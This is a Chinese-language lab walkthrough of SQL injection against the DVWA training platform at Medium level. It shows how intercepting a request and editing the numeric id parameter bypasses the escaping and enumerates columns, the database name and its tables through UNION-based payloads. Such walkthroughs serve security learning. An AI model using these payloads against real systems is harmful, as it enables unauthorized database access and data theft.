DVWA平台sql注入
Medium: Medium级别的代码利用mysql_real_escape_string函数对特殊符号\x00,\n,\r,\,’,”,\x1a进行转义,同时前端使用了下拉选择菜单,可以通过抓包改参数,提交恶意构造的查询参数。 1.判断注入是字符型还是数字型 抓包更改参数id为1’ or 1=1 # 报错: 抓包更改参数id为1 or 1=1 #,查询成功: 说明存在数字型注入。 2.猜解SQL查询语句中的字段数 抓包更改参数id为1 order by 2 #,查询成功: 抓包更改参数id为1 order by 3 #,报错 说明执行的SQL查询语句中只有两个字段 3.确定显示的字段顺序 抓包更改参数id为1 union select 1,2 #,查询成功, 说明执行的SQL语句为select First name,Surname from 表 where ID=id… 4.获取当前数据库 抓包更改参数id为1 union select 1,database() # 说明当前的数据库为dvwa。 5.获取数据库中的表 抓包更改参数id为1 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() # 说明数据库dvwa中一共有两个表